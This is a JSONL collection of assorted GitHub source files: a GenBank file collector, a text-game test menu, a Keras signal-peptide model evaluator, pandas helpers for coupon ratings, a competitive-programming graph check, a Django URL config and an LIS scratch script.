+{"seq_id":"32390049716","text":"#!/usr/bin/env python\n# Usage: collect_gbk_file.py smiles.tsv target_folder\nimport os.path\nimport shutil\nimport sys\nimport pandas as pd\n\n\ndef get_file_path(tsv_file):\n info = pd.read_csv(tsv_file, sep='\\t')\n for idx in info.index:\n folder_path = info.iloc[idx, 0]\n record_id = info.iloc[idx, 1]\n region_id = info.iloc[idx, 2]\n file_region_id = \"000\" + str(region_id)\n file_region_id = file_region_id[-3:]\n gbk_file_name = f'{record_id}.region{file_region_id}.gbk'\n gbk_file_path = os.path.join(folder_path, gbk_file_name)\n yield gbk_file_path\n\n\ndef mv2target(gbk, target_folder):\n changed_file_name = os.path.basename(os.path.dirname(gbk))[:15]\n target = os.path.join(target_folder, f'{changed_file_name}.{os.path.basename(gbk)}')\n shutil.copyfile(gbk, target)\n\nif __name__ == '__main__':\n tsv_file, target_folder = sys.argv[1], sys.argv[2]\n gbk_files = get_file_path(tsv_file)\n for fp in gbk_files:\n mv2target(fp, target_folder)\n","repo_name":"BioGavin/wlabkit","sub_path":"astool/script/others/collect_gbk_file.py","file_name":"collect_gbk_file.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"35027514014","text":"#! /usr/bin/python3.9\nimport actions\nimport item_lib\nimport dbmod\n#character=dbmod.get_row('name','bob','saves')\n#character['items'] = character['items'].split(',')\ncharacter = actions.load_being('bob','saves')\nchoice = \"\"\n\nwhile (choice != 'x'):\n print('''What would you like to test?\n 1 - arena\n 2 - print Character stats\n 3 - slay ROUS\n 4 - enter the store\n 5 - print stats for mouse\n 6 - use item\n 0 - Load character''')\n\n choice = str(input ('make your selection: '))\n actions.wiper()\n print ('You chose ' + choice)\n\n if (choice == '1'):\n actions.arena(character)\n elif (choice == '2'):\n creature = dbmod.get_row('name','mouse','creatures')\n actions.print_status(character)\n elif (choice == '3'):\n actions.combat_victory(character['name'],actions.load_being('ROUS','creatures'))\n elif (choice == '4'):\n actions.home_store.enter()\n elif (choice == '5'):\n opponent = dbmod.get_row('name','mouse','creatures')\n print(opponent['name'])\n elif (choice == '6'):\n item_choice = actions.get_item(character['items'])\n actions.use_item(character,item_choice)\n actions.remove_item(character,item_choice)\n elif (choice == '9'):\n pass\n elif (choice == '0'):\n character=dbmod.get_row('name','bob','saves')\n character['items'] = character['items'].split(',')\n elif (choice == 'x'):\n exit()\n","repo_name":"Destom/GameEngine","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40605855789","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport sys\nsys.path.insert(0, \"../\")\nimport numpy as np\nimport pandas as pd\nimport time\nfrom collections import Counter\n#Preprocessing\nfrom process_data import parse_and_format\n#Keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\nimport glob\nfrom categorical_focal_loss import SparseCategoricalFocalLoss\nfrom attention_class import MultiHeadSelfAttention #https://apoorvnandan.github.io/2020/05/10/transformer-classifier/\n\n\nimport pdb\n\n#Arguments for argparse module:\nparser = argparse.ArgumentParser(description = '''A program that reads a keras model from a .json and a .h5 file''')\nparser.add_argument('--variable_params', nargs=1, type= str, default=sys.stdin, help = 'Path to csv with variable params.')\nparser.add_argument('--param_combo', nargs=1, type= int, default=sys.stdin, help = 'Parameter combo.')\nparser.add_argument('--checkpointdir', nargs=1, type= str, default=sys.stdin, help = '''path checkpoints with .h5 files containing weights for net.''')\nparser.add_argument('--datadir', nargs=1, type= str, default=sys.stdin, help = 'Path to data directory.')\nparser.add_argument('--test_partition', nargs=1, type= int, default=sys.stdin, help = 'Which CV fold to test on.')\nparser.add_argument('--outdir', nargs=1, type= str, default=sys.stdin, help = '''path to output dir.''')\n\n\n#FUNCTIONS\n#####FUNCTIONS and CLASSES#####\nclass TokenAndPositionEmbedding(layers.Layer):\n def __init__(self, maxlen, vocab_size, embed_dim):\n super(TokenAndPositionEmbedding, self).__init__()\n self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\n\n def call(self, x):\n maxlen = tf.shape(x)[-1]\n positions = tf.range(start=0, limit=maxlen, delta=1)\n positions = self.pos_emb(positions)\n x = self.token_emb(x)\n return x + positions\n\nclass EncoderBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(EncoderBlock, self).__init__()\n self.att = MultiHeadSelfAttention(embed_dim,num_heads)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, in_q,in_k,in_v, training): #Inputs is a list with [q,k,v]\n attn_output,attn_weights = self.att(in_q,in_k,in_v) #The weights are needed for downstream analysis\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(in_q + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out1 + ffn_output), attn_weights\n\nclass DecoderBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(DecoderBlock, self).__init__()\n self.att = MultiHeadSelfAttention(embed_dim,num_heads)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, in_q,in_k,in_v, training): #Inputs is a list with [q,k,v]\n #Self-attention\n attn_output1,attn_weights1 = 
self.att(in_q,in_q,in_q) #The weights are needed for downstream analysis\n attn_output1 = self.dropout1(attn_output1, training=training)\n out1 = self.layernorm1(in_v + attn_output1)\n #Encoder-decoder attention\n attn_output2,attn_weights2 = self.att(out1,in_k,in_v) #The weights are needed for downstream analysis\n attn_output2 = self.dropout1(attn_output2, training=training)\n out2 = self.layernorm1(attn_output2 + attn_output1)\n ffn_output = self.ffn(out2)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out2 + ffn_output), attn_weights2\n\ndef create_model(maxlen, vocab_size, embed_dim,num_heads, ff_dim,num_layers,num_iterations):\n '''Create the transformer model\n '''\n\n seq_input = layers.Input(shape=(maxlen,)) #Input aa sequences\n seq_target = layers.Input(shape=(maxlen,)) #Targets - annotations\n kingdom_input = layers.Input(shape=(maxlen,4)) #4 kingdoms, Archaea, Eukarya, Gram +, Gram -\n\n ##Embeddings\n embedding_layer1 = TokenAndPositionEmbedding(maxlen, vocab_size, embed_dim)\n embedding_layer2 = TokenAndPositionEmbedding(maxlen, 6, embed_dim+4) #Need to add 4 so that x1 and x2 match\n x1 = embedding_layer1(seq_input)\n #Add kingdom input\n x1 = layers.Concatenate()([x1,kingdom_input])\n x2 = embedding_layer2(seq_target)\n\n #Define the transformer\n encoder = EncoderBlock(embed_dim+4, num_heads, ff_dim)\n decoder = DecoderBlock(embed_dim+4, num_heads, ff_dim)\n #Iterate\n for i in range(num_iterations):\n #Encode\n for j in range(num_layers):\n x1, enc_attn_weights = encoder(x1,x1,x1) #q,k,v\n #Decoder\n for k in range(num_layers):\n x2, enc_dec_attn_weights = decoder(x2,x1,x1) #q,k,v - the k and v from the encoder goes into he decoder\n\n x2 = layers.Dense(6, activation=\"softmax\")(x2) #Annotate\n x_rs = layers.Reshape((maxlen,6))(x2)\n x2 = tf.math.argmax(x_rs,axis=-1) #Needed for iterative training\n x2 = embedding_layer2(x2)\n\n x2, enc_dec_attn_weights = decoder(x2,x1,x1) #q,k,v - the k and v from the encoder goes into he decoder\n preds = layers.Dense(6, activation=\"softmax\")(x2) #Annotate\n #preds = layers.Reshape((maxlen,6),name='annotation')(x2)\n #pred_type = layers.Dense(4, activation=\"softmax\",name='type')(x) #Type of protein\n #pred_cs = layers.Dense(1, activation=\"elu\", name='pred_cs')(x)\n\n\n model = keras.Model(inputs=[seq_input,seq_target,kingdom_input], outputs=preds)\n #Optimizer\n initial_learning_rate = 0.001\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate,\n decay_steps=10000,\n decay_rate=0.96,\n staircase=True)\n\n opt = tf.keras.optimizers.Adam(learning_rate = lr_schedule,amsgrad=True)\n\n #opt = keras.optimizers.Adam(learning_rate=0.001,amsgrad=True)\n #Compile\n model.compile(optimizer = opt, loss= SparseCategoricalFocalLoss(gamma=2), metrics=[\"accuracy\"])\n\n return model\n\ndef load_model(variable_params, param_combo, weights):\n #Params\n net_params = variable_params.loc[param_combo-1]\n #Fixed params\n vocab_size = 21 # Only consider the top 20k words\n maxlen = 70 # Only consider the first 70 amino acids\n #Variable params\n embed_dim = int(net_params['embed_dim']) #32 # Embedding size for each token\n num_heads = int(net_params['num_heads']) #1 # Number of attention heads\n ff_dim = int(net_params['ff_dim']) #32 # Hidden layer size in feed forward network inside transformer\n num_layers = int(net_params['num_layers']) #1 # Number of attention heads\n batch_size = int(net_params['batch_size']) #32\n num_iterations = int(net_params['num_iterations'])\n 
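#All sizes above come from the hyperparameter grid row selected by param_combo\n    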
#Create model\n model = create_model(maxlen, vocab_size, embed_dim,num_heads, ff_dim,num_layers,num_iterations)\n model.load_weights(weights)\n\n #print(model.summary())\n return model\n\ndef get_data(datadir, valid_partition, maxlen):\n '''Get the validation data\n '''\n\n train_meta = pd.read_csv(datadir+'train_meta.csv')\n train_seqs = np.load(datadir+'seqs.npy',allow_pickle=True)\n train_annotations = np.load(datadir+'annotations.npy',allow_pickle=True)\n\n train_CS = train_meta.CS.values\n train_kingdoms = train_meta.Kingdom.values\n train_meta['Type'] = train_meta['Type'].replace({'NO_SP':0,'SP':1,'TAT':2,'LIPO':3})\n train_types = train_meta.Type.values\n #Onehot conversion\n train_kingdoms = np.eye(4)[train_kingdoms]\n\n #Get data\n valid_i = train_meta[train_meta.Partition==valid_partition].index\n #valid\n x_valid_seqs = train_seqs[valid_i]\n x_valid_kingdoms = train_kingdoms[valid_i]\n x_valid_kingdoms = np.repeat(np.expand_dims(x_valid_kingdoms,axis=1),70,axis=1)\n #Random annotations\n x_valid_target_inp = np.random.randint(6,size=(len(valid_i),maxlen))\n x_valid = [x_valid_seqs,x_valid_target_inp,x_valid_kingdoms]\n y_valid = [train_annotations[valid_i],train_types[valid_i]]\n\n return x_valid_seqs,x_valid_target_inp,x_valid_kingdoms, y_valid\n\ndef run_model(model,x_valid_seqs,x_valid_target_inp,x_valid_kingdoms):\n preds = model.predict([x_valid_seqs,x_valid_target_inp,x_valid_kingdoms])\n\n return preds\n\ndef get_pred_types(pred_annotations):\n '''Get the predicted types based on the annotations\n '''\n\n annotation_type_conversion = {0:1,1:2,2:3} #S(0)=SP(1), T(1)=TAT(2),L(2)=LIPO(3) - all other 0 (No SP)\n pred_types = []\n for i in range(len(pred_annotations)):\n if (0 in pred_annotations[i]) or (1 in pred_annotations[i]) or (2 in pred_annotations[i]):\n counts = Counter(pred_annotations[i])\n keys = [*counts.keys()]\n\n key_count=0 #Count the occurance of each annotation - take the max for the type\n key_type = 0\n for key in annotation_type_conversion: #Got through all keys\n if key not in keys:\n continue\n else:\n if counts[key]>key_count:\n key_count=counts[key]\n key_type=annotation_type_conversion[key]\n\n #Save\n pred_types.append(key_type)\n\n else:\n pred_types.append(0)\n\n return np.array(pred_types)\n\n\ndef eval_type_cs(pred_annotations,pred_annotation_probs,pred_types,true_annotations,true_types,kingdom):\n '''Evaluate the capacity to predict the clevage site\n annotation_conversion = {'S':0,'T':1,'L':2,'I':3,'M':4,'O':5}\n annotation [S: Sec/SPI signal peptide | T: Tat/SPI signal peptide | L: Sec/SPII signal peptide | I: cytoplasm | M: transmembrane | O: extracellular]\n S: Sec/SPI signal peptide | T: Tat/SPI signal peptide | L: Sec/SPII signal peptide |\n 'NO_SP':0,'SP':1,'TAT':2,'LIPO':3\n SP = Sec/SPI\n TAT = Tat/SPI\n LIPO = Sec/SPII\n\n Reported for CS:\n Recall, TPR = TP/P\n Precision, PPV = TP/(TP+FP)\n\n Reported for detection\n MCC = (TP*TN-FP*FN)/np.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n '''\n\n Types = {'SP':1,'LIPO':3,'TAT':2}\n Signal_type_annotations = {'SP':0,'TAT':1,'LIPO':2} #S,T,L\n #Save\n fetched_types = []\n MCCs = []\n Recalls = []\n Precisions = []\n\n if kingdom == 'EUKARYA':\n Types = {'SP':1} #Only one type in Eukarya\n #Go through all types\n for type_name in Types:\n type_enc = Types[type_name]\n P = np.argwhere(true_types==type_enc)[:,0]\n if len(P)<1:\n continue\n N = np.argwhere(true_types!=type_enc)[:,0]\n #Calc TP and FP\n #Get the pred pos and neg\n pred_P = np.argwhere(pred_types==type_enc)[:,0]\n pred_N = 
np.argwhere(pred_types!=type_enc)[:,0]\n        #TP and TN\n        TP = np.intersect1d(P,pred_P).shape[0]\n        if TP<1:\n            continue\n        FP = len(pred_P)-TP\n        TN = np.intersect1d(N,pred_N).shape[0]\n        FN= len(pred_N)-TN\n        #MCC\n        MCC = (TP*TN-FP*FN)/np.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n\n        #Get the CS\n        type_annotation = Signal_type_annotations[type_name]\n        #Get all true positive CSs\n        P_annotations = true_annotations[np.intersect1d(P,pred_P)]\n        P_CS = []\n        for i in range(len(P_annotations)):\n            P_CS.append(np.argwhere(P_annotations[i]==type_annotation)[-1,0])\n\n
        #Get all pred positive CSs from the true positives (all the other will be wrong)\n        P_CS_pred = []\n        P_annotations_pred = pred_annotations[np.intersect1d(P,pred_P)]\n        P_annotation_probs_pred = pred_annotation_probs[np.intersect1d(P,pred_P)]\n        for i in range(len(P_annotations_pred)):\n            try:\n                P_CS_pred.append(np.argwhere(P_annotations_pred[i]==type_annotation)[-1,0])\n            except IndexError:\n                #No residue of this type in the prediction - default the CS to 0\n                P_CS_pred.append(0)\n\n\n        #Get the TP and FP CS\n        TP_CS = {0:0,1:0,2:0,3:0} #exact CS, +/-1 error, +/-2 error, +/-3 error\n        FP_CS = {0:0,1:0,2:0,3:0}\n        for i in range(len(P_CS)):\n            CS_diff = P_CS[i]-P_CS_pred[i]\n            for d in range(0,4):\n                if CS_diff<=d and CS_diff>=-d:\n                    TP_CS[d]+=1\n                else:\n                    FP_CS[d]+=1\n\n        #Add the FPs from the wrong detection\n        for d in range(0,4):\n            FP_CS[d] += FP\n\n        #Calculate CS precision and recall\n        CS_precision = {}\n        CS_recall = {}\n\n        for d in range(0,4):\n            try:\n                CS_precision[d]=TP_CS[d]/(TP_CS[d]+FP_CS[d])\n                CS_recall[d] = TP_CS[d]/P.shape[0]\n            except ZeroDivisionError:\n                CS_precision[d] = 0.0\n                CS_recall[d] = 0.0\n\n\n        #Save\n        fetched_types.append(type_name)\n        MCCs.append(MCC)\n        Precisions.append([*CS_precision.values()])\n        Recalls.append([*CS_recall.values()])\n\n\n    return fetched_types, MCCs, Precisions, Recalls\n\n\n
######################MAIN######################\nargs = parser.parse_args()\nvariable_params=pd.read_csv(args.variable_params[0])\nparam_combo=args.param_combo[0]\ncheckpointdir = args.checkpointdir[0]\ndatadir = args.datadir[0]\ntest_partition = args.test_partition[0]\noutdir = args.outdir[0]\n\nkingdom_conversion = {'ARCHAEA':0,'NEGATIVE':2,'POSITIVE':3,'EUKARYA':1}\n#Load and run model\nall_pred_annotations = []\nall_pred_annotation_probs = []\nall_true_annotations = []\nall_true_types = []\nall_kingdoms = []\n\n#Get data for each valid partition\nfor valid_partition in np.setdiff1d(np.arange(5),test_partition):\n    #weights\n    weights=glob.glob(checkpointdir+'vp'+str(valid_partition)+'/*.hdf5')\n    if len(weights)<1:\n        continue\n    #model\n    model = load_model(variable_params, param_combo, weights[0])\n    #Get data\n    x_valid_seqs,x_valid_target_inp,x_valid_kingdoms, y_valid = get_data(datadir, valid_partition,70)\n    #Predict\n    preds = run_model(model,x_valid_seqs,x_valid_target_inp,x_valid_kingdoms)\n\n    #Fetch\n    pred_annotations = np.argmax(preds,axis=2)\n    true_annotations = y_valid[0]\n    true_types = y_valid[1]\n    kingdoms = np.argmax(x_valid_kingdoms[:,0,:],axis=1)\n    #Save\n    all_pred_annotations.extend([*pred_annotations])\n    all_pred_annotation_probs.extend([*preds])\n    all_true_types.extend([*true_types])\n    all_true_annotations.extend([*true_annotations])\n    all_kingdoms.extend([*kingdoms])\n\n\n\n#Array conversions\nall_pred_annotations = np.array(all_pred_annotations) #The type will be fetched from the annotations\nall_pred_annotation_probs = np.array(all_pred_annotation_probs)\nall_true_annotations = np.array(all_true_annotations)\nall_true_types = np.array(all_true_types)\nall_kingdoms = np.array(all_kingdoms)\n#Get pred types based on pred 
annotations\nall_pred_types = get_pred_types(all_pred_annotations)\n#Evaluate per kingdom\nevaluated_kingdoms = []\nall_types = []\nall_MCCs = []\nall_precisions = []\nall_recalls = []\n\nfor key in kingdom_conversion:\n kingdom_indices = np.argwhere(all_kingdoms==kingdom_conversion[key])[:,0]\n #Get pred\n kingdom_pred_annotations = all_pred_annotations[kingdom_indices]\n kingdom_pred_annotation_probs = all_pred_annotation_probs[kingdom_indices]\n kingdom_pred_types = all_pred_types[kingdom_indices]\n #Get true\n kingdom_true_annotations = all_true_annotations[kingdom_indices]\n kingdom_true_types = all_true_types[kingdom_indices]\n #Eval\n fetched_types, MCCs, Precisions, Recalls = eval_type_cs(kingdom_pred_annotations,kingdom_pred_annotation_probs,kingdom_pred_types,kingdom_true_annotations,kingdom_true_types,key)\n\n #Save\n evaluated_kingdoms.extend([key]*len(fetched_types))\n all_types.extend(fetched_types)\n all_MCCs.extend(MCCs)\n all_precisions.extend(Precisions)\n all_recalls.extend(Recalls)\n\n#Create df\neval_df = pd.DataFrame()\neval_df['Kingdom']=evaluated_kingdoms\neval_df['Type']=all_types\neval_df['MCC']=all_MCCs\neval_df['Recall']=all_recalls\neval_df['Precision']=all_precisions\n\neval_df.to_csv(outdir+'eval_df'+str(test_partition)+'.csv')\nprint(eval_df)\n","repo_name":"patrickbryant1/TransPep","sub_path":"model/validation/run_trained.py","file_name":"run_trained.py","file_ext":"py","file_size_in_byte":16650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6110611292","text":"#!~/anaconda3/bin/python\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom ast import literal_eval\nimport math as m\n\n\n# for extracting time from db date\ndef extract_time(series):\n temp = pd.DatetimeIndex(series)\n return temp.time\n\n\n# for extracting date from db date\ndef extract_date(series):\n temp = pd.DatetimeIndex(series)\n return temp.date\n\n\n# for converting a string date to datetime\ndef convert_date(string_date):\n d = datetime.datetime.strptime(string_date, '%Y-%m-%d').date()\n return d\n\n\n# for extracting yesterday's date\ndef yesterday_date(n):\n ydate = datetime.date.fromordinal(datetime.date.today().toordinal() - n)\n return ydate\n\n\n# for extracting biweekly date\ndef biweekly_date(start_date, n):\n bdate = datetime.date.fromordinal(start_date.toordinal() - n)\n return bdate\n\n\n# for getting previous date\ndef diff_date(pdate, n):\n previous_date = datetime.date.fromordinal(pdate.toordinal() - n)\n return previous_date\n\n\n# for getting future date\ndef add_date(fdate, n):\n future_date = datetime.date.fromordinal(fdate.toordinal() + n)\n return future_date\n\n\n# for getting unique values from a column\ndef unique_values(series):\n new_series = series.unique()\n return new_series\n\n\n# for getting values from a column\ndef getting_values(series):\n new_series = list(series.get_values())\n if len(new_series) == 1:\n new_series = new_series[len(new_series)-1]\n return new_series\n else:\n return new_series\n\n\n# for extracting information between specific dates\ndef extract_range_information(df, column, start_value, end_value):\n df = df[(df[column] >= start_value) & (df[column] <= end_value)]\n return df\n\n\n# Extract information at a specific value\ndef extract_single_information(df, column, value):\n df = df[df[column] == value]\n return df\n\n\n# Calculating stats: total count\ndef total_stats(df, column_name):\n total_df = len(df[column_name].unique())\n return total_df\n\n\n# 
yesterday's stats\ndef yesterday_stats(df, column_name):\n ydate = yesterday_date(n=1)\n yesterday_count = len(df[df[column_name] == ydate])\n return yesterday_count\n\n\n# average over some number\ndef average_stats(df, avg_n):\n count = len(df)\n average = round(count/avg_n,2)\n return average\n\n\n# getting the last value of a dataframe\ndef last_value(df, column_name, n):\n value = df[column_name].tail(n).get_values()\n if len(value) == 1:\n value = value[len(value)-1]\n return value\n\n\n# extracting calender dates\ndef cal_dates(start_date, end_date):\n dates = pd.DataFrame({'Calender Dates': pd.date_range(start=start_date, end=end_date)})\n temp = pd.DatetimeIndex(dates['Calender Dates'])\n dates['Dates'] = temp.date\n return dates\n\n\ndef cal_dates_count(start_date, end_date):\n dates = pd.DataFrame({'Calender Dates': pd.date_range(start=start_date, end=end_date)})\n temp = pd.DatetimeIndex(dates['Calender Dates'])\n dates['Dates'] = temp.date\n return len(dates)\n\n\n# per day count\ndef per_day_count(date_series, df, column_date, count_column):\n count = []\n Date = []\n ids = []\n\n for d in date_series:\n df_d = df[df[column_date] == d]\n consumer_id = df_d['Consumer ID'].unique()\n df_one = np.sum(df_d[count_column])\n ids.append(consumer_id)\n if df_one != 0:\n count_per_day = df_one\n count.append(count_per_day)\n else:\n count_per_day = 0\n count.append(count_per_day)\n Date.append(d)\n\n df_new = pd.DataFrame({'Dates': Date, 'Count/day': count, 'Consumer IDs': ids})\n return df_new\n\n\n# convert string series into numeric\ndef convert_literal(series):\n ids = (series).apply(literal_eval).sum()\n return ids\n\n\n# Convert timestamp to date\ndef convert_timestamp(temp):\n temp = pd.to_datetime(temp)\n temp = temp.to_pydatetime(temp)\n temp = temp.date()\n return temp\n\n\n# Returns a dataframe calculating frequencies\ndef dataframe_frequencies(df, column1, column2):\n df_new = pd.DataFrame({column2 + '_frequency':\n df.groupby([column1, column2]).size()}).reset_index()\n return df_new\n\n\n# Returns merged dataframe\ndef dataframe_merging(df1, df2, column1, column2):\n df_new = pd.merge(df1, df2, how='left', left_on=[column1, column2], right_on=[column1, column2])\n return df_new\n\n\n# Scaled Ratings\ndef scaled_ratings(implicit_rating, a, b):\n\n x = []\n for i in range(0, len(implicit_rating)):\n x_new = a + ((implicit_rating[i] - np.min(implicit_rating)) * (b - a)) / (\n np.max(implicit_rating) - np.min(implicit_rating))\n x_new = round(x_new, 2)\n if m.isnan(x_new) and np.min(implicit_rating) == np.max(implicit_rating):\n x.append(b)\n else:\n x.append(x_new)\n return x\n\n\n# This function takes in dataframe with coupon views and outputs the raw implicit ratings\n# based on frequencies of selected criterias\ndef implicit_ratings(df_coupon, df_store):\n\n # Calculating frequencies for each criteria from same table\n df_user_coupon = dataframe_frequencies(df_coupon, 'user_id', 'coupon_id')\n df_coupon_category = dataframe_frequencies(df_coupon, 'user_id', 'category_id')\n df_coupon_discount = dataframe_frequencies(df_coupon, 'user_id', 'discount')\n df_coupon_retailer = dataframe_frequencies(df_coupon, 'user_id', 'retailer_id')\n df_coupon_store = dataframe_frequencies(df_store, 'user_id', 'retailer_id')\n\n # extract suitable ids from implicit ratings\n df_implicit_ratings = df_coupon[['user_id', 'coupon_id', 'category_id', 'retailer_id', 'discount']]\n df_implicit_ratings = df_implicit_ratings.drop_duplicates()\n\n # Merge frequencies and corresponding ids\n 
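# left joins keep every (user, coupon) pair even when a given frequency column has no match\n    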
df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_user_coupon, 'user_id', 'coupon_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_category, 'user_id', 'category_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_discount, 'user_id', 'discount')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_store, 'user_id', 'retailer_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_retailer, 'user_id', 'retailer_id')\n\n # Filling zeros where frequencies are not available\n df_implicit_ratings.fillna(0, inplace=True)\n\n # Adding retailer frequencies because it is available both from coupon views and coupon ratings\n df_implicit_ratings['retailer_frequency'] = df_implicit_ratings['retailer_id_frequency_x'] + df_implicit_ratings[\n 'retailer_id_frequency_y']\n\n # Getting coupon ratings\n df_implicit_ratings = df_implicit_ratings[['user_id', 'coupon_id', 'coupon_id_frequency',\n 'category_id_frequency', 'discount_frequency',\n 'retailer_frequency']]\n\n # Taking average of retailer frequency\n df_implicit_ratings = df_implicit_ratings.groupby(['user_id', 'coupon_id', 'coupon_id_frequency',\n 'category_id_frequency',\n 'discount_frequency']).mean().reset_index()\n\n # Taking average of frequencies\n df_implicit_ratings['implicit_rating'] = df_implicit_ratings[['coupon_id_frequency', 'category_id_frequency',\n 'discount_frequency', 'retailer_frequency']].mean(axis=1)\n return df_implicit_ratings\n\n","repo_name":"sarwatfatimam/recommender-system","sub_path":"dealsmash.py","file_name":"dealsmash.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15195798369","text":"import sys\r\n\r\nn, m = map(int, input().split())\r\ned = [[] for _ in range(n)]\r\nv = [None] * n\r\nfor _ in range(m):\r\n\tl, r, d = map(int, input().split())\r\n\ted[l-1].append([r-1, d])\r\n\ted[r-1].append([l-1, -d])\r\n\r\nvisited = [False] * n\r\n\r\ndef dfs(start):\r\n\tglobal ed, v, visited\r\n\ts = [start]\r\n\tv[start] = 0\r\n\twhile s:\r\n\t\tlabel = s.pop()\r\n\t\tif visited[label] == False:\r\n\t\t\tvisited[label] = True\r\n\t\t\tfor e in ed[label]:\r\n\t\t\t\tif v[e[0]] is None:\r\n\t\t\t\t\tv[e[0]] = v[label] + e[1]\r\n\t\t\t\t\ts.append(e[0])\r\n\t\t\t\telse:\r\n\t\t\t\t\tif v[e[0]] != v[label] + e[1]:\r\n\t\t\t\t\t\tprint(\"No\")\r\n\t\t\t\t\t\tsys.exit()\r\n\treturn\r\n\r\nfor i in range(n):\r\n\tif v[i] is None:\r\n\t\tdfs(i)\r\n\r\nprint(\"Yes\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc090/B/3897504.py","file_name":"3897504.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41109604195","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n    # user login and authentication endpoints\n    path('',views.UserView.as_view(),name=\"user\"),\n    path('register',views.RegisterView.as_view(),name=\"register\"),\n    path('login',views.LoginView.as_view(),name=\"login\"),\n    path('logout',views.LogoutView.as_view(),name=\"logout\"),\n\n    # product endpoint\n    path('product',views.ProductView.as_view(),name=\"product\"),\n\n    # category endpoint\n    path('category',views.CategoryView.as_view(),name=\"category\"),\n\n    # order endpoint\n    path('order',views.OrderView.as_view(),name=\"order\"),\n]","repo_name":"code002-ZeroTwo/c2cecom","sub_path":"c2c/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"38079302879","text":"#Greedy : the choice made now reduces the number of future moves\n#L : LIS (bisect)\n#Bin : cases that must be structured as a binary tree (binary search tree)\n#D : when the entire route is scanned in one pass\n#B : when a single route is searched to the very end\n#DP : when caching is used repeatedly\n#Graph : other graph theory (cycle-related)\n    # Dijkstra\n    # Floyd-Warshall\n    # Kruskal\n\n#Idea\n#len(LIS), plus the number of cases from backtracking that LIS, plus the starting point\n#Code\nN = int(input());\nXY = [];\nfor i in range(N):\n    XY.append(tuple(map(int,input().split(\" \"))))\n\nXY.sort(key=lambda x:(x[0],x[1]));\nsumForXY = [];\nfor i in XY :\n    sumForXY.append(i[0]+i[1]);\nprint(XY);\nprint(sumForXY)\n#Case\n'''\n11\n8 6\n7 4\n5 4\n5 1\n5 6\n6 2\n3 2\n4 3\n4 5\n3 5\n2 4\n>>>\n4\n3\n'''","repo_name":"ysk0951/algorithm","sub_path":"2022/LIS/3133.py","file_name":"3133.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
